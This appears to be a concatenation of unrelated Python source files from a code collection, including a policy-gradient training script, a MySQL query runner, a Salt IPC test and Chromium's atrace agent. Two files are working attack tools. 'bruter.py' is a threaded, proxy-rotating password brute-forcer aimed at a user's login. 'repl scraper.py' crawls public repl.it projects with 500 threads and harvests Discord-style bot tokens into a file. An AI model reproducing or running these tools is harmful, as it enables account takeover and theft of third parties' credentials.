# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# YOUR_CODE_HERE
self.sess.run(self.baseline_update_op, feed_dict={
self.sy_ob_no: ob_no,
self.sy_target_n: (q_n - q_n.mean(axis=0)) / (q_n.std(axis=0) + 1e-7)
})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
self.sess.run(self.update_op, feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
    # Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
utils.py
|
import registry
import threading
import time
import requests
from . import app
ORCHESTRATOR_ENDPOINT = app.config.get('ORCHESTRATOR_ENDPOINT')
def validate(data, required_fields):
"""Validate if all required_fields are in the given data dictionary"""
return all(field in data for field in required_fields)
def trim_dn(username, version, framework, dn):
dn = dn.replace("instances", "")
if username is not None:
dn = dn.replace("/{}".format(username), "")
if version is not None:
dn = dn.replace("/{}".format(version), "")
if framework is not None:
dn = dn.replace("/{}".format(framework), "")
return dn
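# Example (hypothetical dn): trim_dn("jdoe", "1.0", "cdh",
# "instances/jdoe/cdh/1.0/cluster1") returns "/cluster1", since the
# "instances" prefix and each matching path segment are stripped.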
def print_full_instance(instance):
""" Try to get all the info from an instance or if error, return the dn"""
try:
return {
"result": "success",
"uri": str(instance.dn).replace("instances", "clusters"),
"data": {
"name": instance.dnsname,
"dn": instance.dn,
"status": instance.status
}
}
except registry.KeyDoesNotExist as e:
return {
"result": "failure",
"uri": str(instance.dn),
"message": e.message
}
def print_instance(instance, filters):
""" Try to get the basic info from the instance or if error, return the dn"""
(username, service, version) = filters
try:
return {
"result": "success",
# FIXME we have to return the full uri so that the interface
# works, plus the "instances" part of the uri has to be
# replaced by "clusters" so that it matches the endpoint
"uri": str(instance.dn).replace("instances", "clusters"),
"data": {
"name" : instance.dnsname,
"dn" : instance.dn,
"status" : instance.status
}
}
except registry.KeyDoesNotExist as e:
return {
"result": "failure",
"uri": str(instance.dn),
"message": e.message
}
def launch_orchestrator_when_ready(clusterdn):
"""Launch the orchestrator process"""
cluster = registry.get_cluster(dn=clusterdn)
clusterid = registry.id_from(clusterdn)
def orchestrate_when_cluster_is_ready():
# TODO Use a blocking kv query to get immediate notification
app.logger.info('Waiting for cluster nodes to be scheduled')
while cluster.status != 'scheduled':
time.sleep(5)
app.logger.info('All cluster nodes have been scheduled')
# Wait so containers can boot
#app.logger.info('Waiting 20s for containers to boot')
#time.sleep(20)
app.logger.info('Launching orchestrator')
requests.post('{}/{}'.format(ORCHESTRATOR_ENDPOINT, clusterid))
t = threading.Thread(target=orchestrate_when_cluster_is_ready)
t.daemon = True
t.start()
|
bruter.py
|
# Date: 12/28/2018
# Author: Mohamed
# Description: Bruter
from time import time, sleep
from .browser import Browser
from .session import Session
from .display import Display
from threading import Thread, RLock
from .proxy_manager import ProxyManager
from .password_manager import PasswordManager
from .const import max_time_to_wait, max_bots_per_proxy
class Bruter(object):
def __init__(self, username, threads, passlist_path, resume):
self.browsers = []
self.lock = RLock()
self.password = None
self.is_alive = True
self.is_found = False
self.bots_per_proxy = 0
self.username = username
self.last_password = None
self.active_passwords = []
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.session = Session(username, passlist_path)
self.password_manager = PasswordManager(
passlist_path, threads, self.session, resume)
if resume:
data = self.session.read()
if data:
self.password_manager.passlist = eval(data['list'])
self.password_manager.attempts = int(data['attempts'])
def manage_session(self):
if self.password_manager.is_read:
if not self.password_manager.list_size or self.is_found:
self.session.delete()
else:
if self.is_found:
self.session.delete()
else:
self.session.write(self.password_manager.attempts,
self.password_manager.passlist)
def browser_manager(self):
while self.is_alive:
for browser in self.browsers:
if not self.is_alive:
break
if Display.account_exists is None and Browser.account_exists is not None:
Display.account_exists = Browser.account_exists
if not browser.is_active:
password = browser.password
if browser.is_attempted and not browser.is_locked:
if browser.is_found and not self.is_found:
self.password = password
self.is_found = True
with self.lock:
self.password_manager.list_remove(password)
else:
with self.lock:
self.proxy_manager.bad_proxy(browser.proxy)
self.remove_browser(browser)
else:
if browser.start_time:
if time() - browser.start_time >= max_time_to_wait:
browser.close()
def remove_browser(self, browser):
if browser in self.browsers:
with self.lock:
self.browsers.pop(self.browsers.index(browser))
self.active_passwords.pop(
self.active_passwords.index(browser.password))
def attack(self):
proxy = None
is_attack_started = False
while self.is_alive:
browsers = []
for password in self.password_manager.passlist:
if not self.is_alive:
break
if not proxy:
proxy = self.proxy_manager.get_proxy()
self.bots_per_proxy = 0
if self.bots_per_proxy >= max_bots_per_proxy:
proxy = None
if not proxy:
continue
if password not in self.active_passwords and password in self.password_manager.passlist:
browser = Browser(self.username, password, proxy)
browsers.append(browser)
self.bots_per_proxy += 1
if not is_attack_started:
self.display.info('Starting attack ...')
is_attack_started = True
with self.lock:
self.browsers.append(browser)
self.active_passwords.append(password)
for browser in browsers:
thread = Thread(target=browser.attempt)
thread.daemon = True
try:
thread.start()
except RuntimeError:
self.remove_browser(browser)
def start_daemon_threads(self):
attack = Thread(target=self.attack)
browser_manager = Thread(target=self.browser_manager)
proxy_manager = Thread(target=self.proxy_manager.start)
password_manager = Thread(target=self.password_manager.start)
attack.daemon = True
proxy_manager.daemon = True
browser_manager.daemon = True
password_manager.daemon = True
attack.start()
proxy_manager.start()
browser_manager.start()
password_manager.start()
self.display.info('Searching for proxies ...')
def stop_daemon_threads(self):
self.proxy_manager.stop()
self.password_manager.stop()
def start(self):
self.display.info('Initiating daemon threads ...')
self.start_daemon_threads()
last_attempt = 0
while self.is_alive and not self.is_found:
if last_attempt == self.password_manager.attempts and self.password_manager.attempts:
sleep(0.1)
continue
for browser in self.browsers:
self.display.stats(
browser.password, self.password_manager.attempts, len(self.browsers))
last_attempt = self.password_manager.attempts
self.last_password = browser.password
if not self.is_alive or self.is_found:
break
if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers):
self.is_alive = False
def stop(self):
self.is_alive = False
self.manage_session()
self.stop_daemon_threads()
self.session.is_busy = False
|
repl scraper.py
|
import requests, json, base64, re, random, time, uuid
from bs4 import BeautifulSoup
from threading import Thread
class queue:
queue=['https://repl.it/site/repls']
checked=[]
def scrapepos(indexpos):
currenturl=queue.queue[indexpos]
del queue.queue[indexpos]
print(f'Scraping: [ {currenturl} ]')
soup=BeautifulSoup(requests.get(currenturl).text,'html.parser')
if re.match('https?:\/\/repl.it\/@(([^/]+){3,15})\/(.{1,60})',currenturl)!=None:
try:
json1=soup.findAll('script',text=True)[-1].text.strip()
json1=json.loads(json1[json1.find('{'):].splitlines()[0])
files=json1['props']['initialState']['files']
for i in files.values():
code=base64.b64decode(i['content']['asEncoding']['base64']).decode('utf8')
code=''.join(code.split())
regex='([A-z0-9]{24})\.([A-z0-9-]{6})\.([A-z0-9-]{27})'
r=re.search(regex,code)
if r!=None:
open('tokens.txt','a').write(f'\nFound token in {currenturl}: '+r.group())
print(f'Found token in {currenturl}: {r.group()}')
except:
return
else:
for link in soup.findAll('a'):
currenturl=link.get('href')
if currenturl==None:continue
try:
if currenturl[0]=='.':continue
if currenturl[0]=='/':currenturl='https://repl.it'+currenturl
if not currenturl.startswith('http'):currenturl='https://repl.it/'+currenturl
if currenturl not in queue.queue and uuid.uuid3(uuid.NAMESPACE_URL,currenturl) not in queue.checked:
if currenturl.startswith('https://repl.it'):
if 'bot' in currenturl.lower() or 'discord' in currenturl.lower() or 'selfbot' or 'replbot' in currenturl.lower() or 'antinuke' in currenturl.lower() or 'exeter' in currenturl.lower() in currenturl.lower() or currenturl.startswith('https://repl.it/site/repls') or re.match('(https:\/\/repl.itDELETETHIS\/@)[A-z0-9]{3,15}$',currenturl)!=None:
queue.queue.append(currenturl)
queue.checked.append(uuid.uuid3(uuid.NAMESPACE_URL,currenturl))
except:
continue
print('...')
open('tokens.txt','w').write('\n...\n')
def scrape(threadid):
while True:
try:
queue.queue=queue.queue[:10000]
indexpos=random.randint(0,len(queue.queue)-1)
scrapepos(indexpos)
except:
pass
for i in range(500):
try:
Thread(target=scrape,args=(i,)).start()
except:
pass
while True:
time.sleep(1)
|
huecontroller.py
|
from phue import Bridge
from threading import Thread
import time
from rgb_cie import ColorHelper
import numpy as np
class HueController:
LEFT_LAMP_NBR = 1
RIGHT_LAMP_NBR = 3
BRIDGE_IP = '192.168.0.243'
def __init__(self, frame_listener):
def lamp_controller():
while True:
time.sleep(0.1)
if self.frame_listener.get_confidence() > 0.1:
hand_angle = self.frame_listener.get_hand_angle()
prev_lamp = self.current_lamp
if self.current_lamp == self.LEFT_LAMP_NBR and hand_angle > np.pi/2.0 + np.pi/8.0:
self.current_lamp = self.RIGHT_LAMP_NBR
elif self.current_lamp == self.RIGHT_LAMP_NBR and hand_angle < np.pi/2.0 - np.pi/8.0:
self.current_lamp = self.LEFT_LAMP_NBR
if prev_lamp != self.current_lamp:
xy = b.get_light(prev_lamp, 'xy')
b.set_light(prev_lamp, 'on', False)
b.set_light(self.current_lamp, 'on', True)
b.set_light(self.current_lamp, 'xy', xy)
bri = self.get_current_brightness()
lamp_on = b.get_light(self.current_lamp, 'on')
if bri == 0:
if lamp_on:
b.set_light(self.current_lamp, 'on', False)
else:
if not lamp_on:
b.set_light(self.current_lamp, 'on', True)
b.set_light(self.current_lamp, 'bri', bri)
new_finger_down = self.frame_listener.pop_new_finger_down_if_any()
if new_finger_down is not None:
b.lights[self.current_lamp - 1].xy = ColorHelper().getXYPointFromRGB(*self.colors[new_finger_down])
self.current_lamp = self.RIGHT_LAMP_NBR
self.frame_listener = frame_listener
b = Bridge(self.BRIDGE_IP)
b.connect()
b.set_light(self.LEFT_LAMP_NBR, 'on', False)
b.set_light(self.RIGHT_LAMP_NBR, 'on', False)
self.colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 255)]
Thread(target=lamp_controller).start()
def get_current_brightness(self):
# Roughly map the clamped angle-derived value in [0, 1] onto a brightness in [0, 255]
angle = self.frame_listener.get_average_angle()
if self.frame_listener.get_confidence() == 0 or angle is None:
return 0
return int(min(255, 255.0*min(1.0, max(0.0, -angle + 0.5))))
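# Worked examples of the mapping above: angle=0.5 gives -0.5+0.5=0.0, i.e.
# brightness 0; angle=-0.5 clamps to 1.0, i.e. brightness 255; values in
# between scale linearly.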
|
test_ipc.py
|
"""
:codeauthor: Mike Place <mp@saltstack.com>
"""
import errno
import logging
import os
import threading
import pytest
import salt.config
import salt.exceptions
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.ext.tornado.testing
import salt.transport.client
import salt.transport.ipc
import salt.transport.server
import salt.utils.platform
from salt.ext.tornado.iostream import StreamClosedError
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
pytestmark = [
pytest.mark.skip_on_darwin,
pytest.mark.skip_on_freebsd,
pytest.mark.skip_on_windows,
]
log = logging.getLogger(__name__)
@skipIf(salt.utils.platform.is_windows(), "Windows does not support Posix IPC")
class IPCMessagePubSubCase(salt.ext.tornado.testing.AsyncTestCase):
"""
Test all of the clear msg stuff
"""
def setUp(self):
super().setUp()
self.opts = {"ipc_write_buffer": 0}
self.socket_path = os.path.join(RUNTIME_VARS.TMP, "ipc_test.ipc")
self.pub_channel = self._get_pub_channel()
self.sub_channel = self._get_sub_channel()
def _get_pub_channel(self):
pub_channel = salt.transport.ipc.IPCMessagePublisher(
self.opts,
self.socket_path,
)
pub_channel.start()
return pub_channel
def _get_sub_channel(self):
sub_channel = salt.transport.ipc.IPCMessageSubscriber(
socket_path=self.socket_path,
io_loop=self.io_loop,
)
sub_channel.connect(callback=self.stop)
self.wait()
return sub_channel
def tearDown(self):
super().tearDown()
try:
self.pub_channel.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If it's not a bad file descriptor error, raise
raise
try:
self.sub_channel.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If it's not a bad file descriptor error, raise
raise
os.unlink(self.socket_path)
del self.pub_channel
del self.sub_channel
def test_multi_client_reading(self):
# To be completely fair let's create 2 clients.
client1 = self.sub_channel
client2 = self._get_sub_channel()
call_cnt = []
# Create a watchdog to be safe from hanging in sync loops (what old code did)
evt = threading.Event()
def close_server():
if evt.wait(1):
return
client2.close()
self.stop()
watchdog = threading.Thread(target=close_server)
watchdog.start()
# Runs in ioloop thread so we're safe from race conditions here
def handler(raw):
call_cnt.append(raw)
if len(call_cnt) >= 2:
evt.set()
self.stop()
# Now have both clients waiting for data at once
client1.read_async(handler)
client2.read_async(handler)
self.pub_channel.publish("TEST")
self.wait()
self.assertEqual(len(call_cnt), 2)
self.assertEqual(call_cnt[0], "TEST")
self.assertEqual(call_cnt[1], "TEST")
def test_sync_reading(self):
# To be completely fair let's create 2 clients.
client1 = self.sub_channel
client2 = self._get_sub_channel()
call_cnt = []
# Now have both clients waiting for data at once
self.pub_channel.publish("TEST")
ret1 = client1.read_sync()
ret2 = client2.read_sync()
self.assertEqual(ret1, "TEST")
self.assertEqual(ret2, "TEST")
@salt.ext.tornado.testing.gen_test
def test_async_reading_streamclosederror(self):
client1 = self.sub_channel
call_cnt = []
# Create a watchdog to be safe from hanging in sync loops (what old code did)
evt = threading.Event()
def close_server():
if evt.wait(0.001):
return
client1.close()
self.stop()
watchdog = threading.Thread(target=close_server)
watchdog.start()
# Runs in ioloop thread so we're safe from race conditions here
def handler(raw):
pass
try:
ret1 = yield client1.read_async(handler)
self.wait()
except StreamClosedError as ex:
assert False, "StreamClosedError was raised inside the Future"
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from todoism.extensions import mail
def _send_mail_async(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['TODOISM_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_mail_async, args=[app, message])
thr.start()
return thr
def send_confirm_mail(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
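# Usage sketch (the token helper is an assumption, not part of this module):
#
# token = generate_confirm_token(user)  # hypothetical helper
# send_confirm_mail(user, token)
#
# send_mail returns the Thread, so callers that must wait for delivery
# (e.g. in tests) can call thr.join().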
|
mysql.py
|
import logging
import os
import threading
from redash.query_runner import (
TYPE_FLOAT,
TYPE_INTEGER,
TYPE_DATETIME,
TYPE_STRING,
TYPE_DATE,
BaseSQLQueryRunner,
InterruptException,
JobTimeoutException,
register,
)
from redash.settings import parse_boolean
from redash.utils import json_dumps, json_loads
from redash.tasks.worker import JobTimeoutException
try:
import MySQLdb
enabled = True
except ImportError:
enabled = False
logger = logging.getLogger(__name__)
types_map = {
0: TYPE_FLOAT,
1: TYPE_INTEGER,
2: TYPE_INTEGER,
3: TYPE_INTEGER,
4: TYPE_FLOAT,
5: TYPE_FLOAT,
7: TYPE_DATETIME,
8: TYPE_INTEGER,
9: TYPE_INTEGER,
10: TYPE_DATE,
12: TYPE_DATETIME,
15: TYPE_STRING,
16: TYPE_INTEGER,
246: TYPE_FLOAT,
253: TYPE_STRING,
254: TYPE_STRING,
}
class Result(object):
def __init__(self):
pass
class Mysql(BaseSQLQueryRunner):
noop_query = "SELECT 1"
@classmethod
def configuration_schema(cls):
show_ssl_settings = parse_boolean(
os.environ.get("MYSQL_SHOW_SSL_SETTINGS", "true")
)
schema = {
"type": "object",
"properties": {
"host": {"type": "string", "default": "127.0.0.1"},
"user": {"type": "string"},
"passwd": {"type": "string", "title": "Password"},
"db": {"type": "string", "title": "Database name"},
"port": {"type": "number", "default": 3306},
},
"order": ["host", "port", "user", "passwd", "db"],
"required": ["db"],
"secret": ["passwd"],
}
if show_ssl_settings:
schema["properties"].update(
{
"use_ssl": {"type": "boolean", "title": "Use SSL"},
"ssl_cacert": {
"type": "string",
"title": "Path to CA certificate file to verify peer against (SSL)",
},
"ssl_cert": {
"type": "string",
"title": "Path to client certificate file (SSL)",
},
"ssl_key": {
"type": "string",
"title": "Path to private key file (SSL)",
},
}
)
return schema
@classmethod
def name(cls):
return "MySQL"
@classmethod
def enabled(cls):
return enabled
def _connection(self):
params = dict(
host=self.configuration.get("host", ""),
user=self.configuration.get("user", ""),
passwd=self.configuration.get("passwd", ""),
db=self.configuration["db"],
port=self.configuration.get("port", 3306),
charset="utf8",
use_unicode=True,
connect_timeout=60,
)
ssl_options = self._get_ssl_parameters()
if ssl_options:
params["ssl"] = ssl_options
connection = MySQLdb.connect(**params)
return connection
def _get_tables(self, schema):
query = """
SELECT col.table_schema as table_schema,
col.table_name as table_name,
col.column_name as column_name
FROM `information_schema`.`columns` col
WHERE col.table_schema NOT IN ('information_schema', 'performance_schema', 'mysql', 'sys');
"""
results, error = self.run_query(query, None)
if error is not None:
raise Exception("Failed getting schema.")
results = json_loads(results)
for row in results["rows"]:
if row["table_schema"] != self.configuration["db"]:
table_name = "{}.{}".format(row["table_schema"], row["table_name"])
else:
table_name = row["table_name"]
if table_name not in schema:
schema[table_name] = {"name": table_name, "columns": []}
schema[table_name]["columns"].append(row["column_name"])
return list(schema.values())
def run_query(self, query, user):
ev = threading.Event()
thread_id = ""
r = Result()
t = None
try:
connection = self._connection()
thread_id = connection.thread_id()
t = threading.Thread(
target=self._run_query, args=(query, user, connection, r, ev)
)
t.start()
while not ev.wait(1):
pass
except JobTimeoutException as e:
self._cancel(thread_id)
t.join()
raise e
except (KeyboardInterrupt, InterruptException):
error = self._cancel(thread_id)
t.join()
r.json_data = None
r.error = "Query cancelled by user."
if error is not None:
r.error = error
return r.json_data, r.error
def _run_query(self, query, user, connection, r, ev):
cursor = None
try:
cursor = connection.cursor()
logger.debug("MySQL running query: %s", query)
cursor.execute(query)
data = cursor.fetchall()
desc = cursor.description
while cursor.nextset():
if cursor.description is not None:
data = cursor.fetchall()
desc = cursor.description
# TODO - very similar to pg.py
if desc is not None:
columns = self.fetch_columns(
[(i[0], types_map.get(i[1], None)) for i in desc]
)
rows = [
dict(zip((column["name"] for column in columns), row))
for row in data
]
data = {"columns": columns, "rows": rows}
r.json_data = json_dumps(data)
r.error = None
else:
r.json_data = None
r.error = "No data was returned."
cursor.close()
except MySQLdb.Error as e:
if cursor:
cursor.close()
r.json_data = None
r.error = e.args[1]
finally:
ev.set()
if connection:
connection.close()
def _get_ssl_parameters(self):
if not self.configuration.get("use_ssl"):
return None
ssl_params = {}
if self.configuration.get("use_ssl"):
config_map = {"ssl_cacert": "ca", "ssl_cert": "cert", "ssl_key": "key"}
for key, cfg in config_map.items():
val = self.configuration.get(key)
if val:
ssl_params[cfg] = val
return ssl_params
def _cancel(self, thread_id):
connection = None
cursor = None
error = None
try:
connection = self._connection()
cursor = connection.cursor()
query = "KILL %d" % (thread_id)
logging.debug(query)
cursor.execute(query)
except MySQLdb.Error as e:
if cursor:
cursor.close()
error = e.args[1]
finally:
if connection:
connection.close()
return error
class RDSMySQL(Mysql):
@classmethod
def name(cls):
return "MySQL (Amazon RDS)"
@classmethod
def type(cls):
return "rds_mysql"
@classmethod
def configuration_schema(cls):
return {
"type": "object",
"properties": {
"host": {"type": "string"},
"user": {"type": "string"},
"passwd": {"type": "string", "title": "Password"},
"db": {"type": "string", "title": "Database name"},
"port": {"type": "number", "default": 3306},
"use_ssl": {"type": "boolean", "title": "Use SSL"},
},
"order": ["host", "port", "user", "passwd", "db"],
"required": ["db", "user", "passwd", "host"],
"secret": ["passwd"],
}
def _get_ssl_parameters(self):
if self.configuration.get("use_ssl"):
ca_path = os.path.join(
os.path.dirname(__file__), "./files/rds-combined-ca-bundle.pem"
)
return {"ca": ca_path}
return None
register(Mysql)
register(RDSMySQL)
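# Minimal sketch of the worker-thread pattern run_query uses above, with a
# plain function standing in for the MySQL work (kept commented out so this
# module's import behaviour is unchanged):
#
# def _demo_worker(result, ev):
#     result.value = 42  # stand-in for cursor.execute()/fetchall()
#     ev.set()
#
# class _DemoResult(object):
#     value = None
#
# r, ev = _DemoResult(), threading.Event()
# t = threading.Thread(target=_demo_worker, args=(r, ev))
# t.start()
# while not ev.wait(1):
#     pass  # an exception raised here is the cancellation hook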
|
atrace_agent.py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import platform
import re
import sys
import threading
import zlib
import py_utils
from devil.android import device_utils
from devil.android.sdk import version_codes
from py_trace_event import trace_time as trace_time_module
from systrace import trace_result
from systrace import tracing_agents
from systrace import util
# Text that ADB sends, but does not need to be displayed to the user.
ADB_IGNORE_REGEXP = r'^capturing trace\.\.\. done|^capturing trace\.\.\.'
# The number of seconds to wait on output from ADB.
ADB_STDOUT_READ_TIMEOUT = 0.2
# The number of seconds to wait for large output from ADB.
ADB_LARGE_OUTPUT_TIMEOUT = 600
# The adb shell command to initiate a trace.
ATRACE_BASE_ARGS = ['atrace']
# If a custom list of categories is not specified, traces will include
# these categories (if available on the device).
DEFAULT_CATEGORIES = 'am,binder_driver,camera,dalvik,freq,'\
'gfx,hal,idle,input,memory,memreclaim,'\
'res,sched,sync,view,webview,wm,workq'
# The command to list trace categories.
LIST_CATEGORIES_ARGS = ATRACE_BASE_ARGS + ['--list_categories']
# Minimum number of seconds between displaying status updates.
MIN_TIME_BETWEEN_STATUS_UPDATES = 0.2
# ADB sends this text to indicate the beginning of the trace data.
TRACE_START_REGEXP = r'TRACE\:'
# Plain-text trace data should always start with this string.
TRACE_TEXT_HEADER = '# tracer'
_FIX_MISSING_TGIDS = True
_FIX_CIRCULAR_TRACES = True
def list_categories(config):
"""List the possible trace event categories.
This function needs the tracing config since it needs to get the serial
number of the device to send a command to.
Args:
config: Tracing config.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories = devutils.RunShellCommand(
LIST_CATEGORIES_ARGS, check_return=True)
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version < version_codes.MARSHMALLOW:
# work around platform bug where rs tag would corrupt trace until M(Api23)
categories = [c for c in categories if not re.match(r'^\s*rs\s*-', c)]
print '\n'.join(categories)
if not devutils.HasRoot():
print '\nNOTE: more categories may be available with adb root\n'
def get_available_categories(config, device_sdk_version):
"""Gets the list of atrace categories available for tracing.
Args:
config: Tracing config.
device_sdk_version: Sdk version int of device to be queried.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories_output = devutils.RunShellCommand(
LIST_CATEGORIES_ARGS, check_return=True)
categories = [c.split('-')[0].strip() for c in categories_output]
if device_sdk_version < version_codes.MARSHMALLOW:
# work around platform bug where rs tag would corrupt trace until M(Api23)
categories = [c for c in categories if c != 'rs']
return categories
def try_create_agent(config):
"""Create an Atrace agent.
Args:
config: Command line config.
"""
if config.target != 'android':
return None
if config.from_file is not None:
return None
if not config.atrace_categories:
return None
# Check device SDK version.
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version < version_codes.JELLY_BEAN_MR2:
print ('Device SDK versions < 18 (Jellybean MR2) not supported.\n'
'Your device SDK version is %d.' % device_sdk_version)
return None
return AtraceAgent(device_sdk_version, util.get_tracing_path())
def _construct_extra_atrace_args(config, categories):
"""Construct extra arguments (-a, -k, categories) for atrace command.
Args:
config: Tracing config.
"""
extra_args = []
if config.app_name is not None:
extra_args.extend(['-a', config.app_name])
if config.kfuncs is not None:
extra_args.extend(['-k', config.kfuncs])
extra_args.extend(categories)
return extra_args
def _construct_atrace_args(config, categories):
"""Builds the command used to invoke a trace process.
Returns:
A tuple where the first element is an array of command arguments, and
the second element is a boolean which will be true if the command will
stream trace data.
"""
atrace_args = ATRACE_BASE_ARGS[:]
if config.compress_trace_data:
atrace_args.extend(['-z'])
if (config.trace_time is not None) and (config.trace_time > 0):
atrace_args.extend(['-t', str(config.trace_time)])
if (config.trace_buf_size is not None) and (config.trace_buf_size > 0):
atrace_args.extend(['-b', str(config.trace_buf_size)])
elif 'webview' in categories and 'sched' in categories:
# https://crbug.com/814330: webview_startup sometimes exceeds the buffer
# limit, so doubling this.
atrace_args.extend(['-b', '8192'])
elif 'sched' in categories:
# 'sched' is a high-volume tag, double the default buffer size
# to accommodate that
atrace_args.extend(['-b', '4096'])
extra_args = _construct_extra_atrace_args(config, categories)
atrace_args.extend(extra_args)
return atrace_args
class AtraceAgent(tracing_agents.TracingAgent):
def __init__(self, device_sdk_version, tracing_path):
super(AtraceAgent, self).__init__()
self._device_sdk_version = device_sdk_version
self._tracing_path = tracing_path
self._adb = None
self._trace_data = None
self._tracer_args = None
self._collection_thread = None
self._device_utils = None
self._device_serial_number = None
self._config = None
self._categories = None
def __repr__(self):
return 'atrace'
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
assert config.atrace_categories, 'Atrace categories are missing!'
self._config = config
self._categories = config.atrace_categories
if isinstance(self._categories, list):
self._categories = ','.join(self._categories)
avail_cats = get_available_categories(config, self._device_sdk_version)
